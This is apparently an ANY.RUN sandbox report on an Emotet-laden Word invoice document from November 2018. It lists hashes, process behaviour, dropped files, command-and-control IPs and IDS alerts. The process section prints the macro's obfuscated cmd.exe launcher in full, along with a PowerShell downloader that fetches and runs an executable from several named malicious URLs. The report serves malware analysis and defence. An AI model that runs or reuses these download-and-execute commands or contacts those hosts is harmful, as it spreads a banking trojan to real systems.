analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rechnung-SF82934563-744.doc

Full analysis: https://app.any.run/tasks/c8c11740-8d0f-4bea-a929-d70d91fdcda4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 14, 2018, 07:46:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Keira, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 06:38:00 2018, Last Saved Time/Date: Wed Nov 14 06:38:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

C1990F728D04C7047CC40B3800607707

SHA1:

F0B30229E5FF7DED49DEF856068209E1FBBAFD4F

SHA256:

428091CD489DCADA56F68EF5F11708B1CCFD93E308AA05BBE367C6A61CEB11E5

SSDEEP:

1536:A9ocn1kp59gxBK85fBt+a92/cC50hedtx89Z5vRZVAyn:l41k/W488F50hedtx89Z5vRZVDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1352)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1352)
    • Application was dropped or rewritten from another process

      • AJT.exe (PID: 1984)
      • AJT.exe (PID: 3244)
      • lpiograd.exe (PID: 3660)
      • lpiograd.exe (PID: 3264)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1672)
    • Emotet process was detected

      • lpiograd.exe (PID: 3660)
    • EMOTET was detected

      • lpiograd.exe (PID: 3264)
    • Connects to CnC server

      • lpiograd.exe (PID: 3264)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3916)
    • Creates files in the user directory

      • powershell.exe (PID: 1672)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 1672)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1672)
      • AJT.exe (PID: 3244)
    • Application launched itself

      • AJT.exe (PID: 1984)
      • lpiograd.exe (PID: 3660)
    • Starts itself from another location

      • AJT.exe (PID: 3244)
    • Connects to unusual port

      • lpiograd.exe (PID: 3264)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1352)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Keira
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:14 06:38:00
ModifyDate: 2018:11:14 06:38:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe ajt.exe no specs ajt.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
1352"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rechnung-SF82934563-744.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3916cmd /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&&i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%" C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1672powershell $HHz='uVm';$ThA='http://anayacontracting.ggbro.club/W61Td2h@http://mentor1st.com/GPjQt2Pxe@http://vpentimex.com/Dd1OSOO@http://braithwaiterestoration.com/dgFKEvC@http://beepro-propolis.com/xfMloEkt6'.Split('@');$ovi=([System.IO.Path]::GetTempPath()+'\AJT.exe');$jXI =New-Object -com 'msxml2.xmlhttp';$Iwi = New-Object -com 'adodb.stream';foreach($dnO in $ThA){try{$jXI.open('GET',$dnO,0);$jXI.send();$Iwi.open();$Iwi.type = 1;$Iwi.write($jXI.responseBody);$Iwi.savetofile($ovi);Start-Process $ovi;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1984"C:\Users\admin\AppData\Local\Temp\AJT.exe" C:\Users\admin\AppData\Local\Temp\AJT.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600.1
3244"C:\Users\admin\AppData\Local\Temp\AJT.exe"C:\Users\admin\AppData\Local\Temp\AJT.exe
AJT.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600.1
3660"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
AJT.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600.1
3264"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Version:
6.1.7600.1
Total events
1 683
Read events
1 267
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1352WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR98A1.tmp.cvr
MD5:
SHA256:
1672powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VBD1RUP4YLCVH7US8KKQ.temp
MD5:
SHA256:
1672powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\CnMM9gEYzr[1].exe
MD5:
SHA256:
1352WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DCFF43E80D95745E0551E04C512C4A96
SHA256:0D2128A5C35CDB99164F760F7BB450F4EDCD31741BB6681D9E252F89503622DB
1672powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1672powershell.exeC:\Users\admin\AppData\Local\Temp\AJT.exeexecutable
MD5:5A708A18B1C4F1538C3622A2CA70A550
SHA256:8AE2C53712682B5791917C42C1AD366EAFEF965966EBF338365FDACB39AD7D07
1672powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da65d.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3244AJT.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:5A708A18B1C4F1538C3622A2CA70A550
SHA256:8AE2C53712682B5791917C42C1AD366EAFEF965966EBF338365FDACB39AD7D07
1352WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$chnung-SF82934563-744.docpgc
MD5:470D7607F6A2B2F736EF43F45C9E39D0
SHA256:A9E6D86875A1B049C980CAB6E06781C6ED5603F5125E2AFB9DD428584C226064
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
12
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3264
lpiograd.exe
GET
187.163.174.149:8080
http://187.163.174.149:8080/
MX
malicious
1672
powershell.exe
GET
200
108.179.213.61:80
http://anayacontracting.ggbro.club/W61Td2h/
US
executable
123 Kb
malicious
3264
lpiograd.exe
GET
207.255.59.231:443
http://207.255.59.231:443/
US
malicious
3264
lpiograd.exe
GET
216.176.21.143:80
http://216.176.21.143/
US
malicious
3264
lpiograd.exe
GET
187.207.72.201:443
http://187.207.72.201:443/
MX
malicious
3264
lpiograd.exe
GET
70.60.50.60:8080
http://70.60.50.60:8080/
US
malicious
3264
lpiograd.exe
GET
5.32.65.50:8080
http://5.32.65.50:8080/
AE
malicious
3264
lpiograd.exe
GET
118.69.186.155:8080
http://118.69.186.155:8080/
VN
malicious
3264
lpiograd.exe
GET
210.2.86.72:8080
http://210.2.86.72:8080/
VN
malicious
3264
lpiograd.exe
GET
96.246.206.16:80
http://96.246.206.16/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3264
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
1672
powershell.exe
108.179.213.61:80
anayacontracting.ggbro.club
CyrusOne LLC
US
suspicious
3264
lpiograd.exe
70.60.50.60:8080
Time Warner Cable Internet LLC
US
malicious
3264
lpiograd.exe
207.255.59.231:443
Atlantic Broadband Finance, LLC
US
malicious
3264
lpiograd.exe
118.69.186.155:8080
The Corporation for Financing & Promoting Technology
VN
malicious
3264
lpiograd.exe
50.21.147.8:8090
Otelco Telephone, LLC
US
malicious
3264
lpiograd.exe
216.176.21.143:80
Great Lakes Comnet, Inc.
US
malicious
3264
lpiograd.exe
187.163.49.123:8090
Axtel, S.A.B. de C.V.
MX
malicious
3264
lpiograd.exe
5.32.65.50:8080
Emirates Integrated Telecommunications Company PJSC (EITC-DU)
AE
malicious
3264
lpiograd.exe
210.2.86.72:8080
Quang Trung Software City Development Company
VN
malicious

DNS requests

Domain
IP
Reputation
anayacontracting.ggbro.club
  • 108.179.213.61
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
1672
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1672
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
1672
powershell.exe
A Network Trojan was detected
ET TROJAN VBScript Redirect Style Exe File Download
1672
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3264
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
8 ETPRO signatures available at the full report
No debug info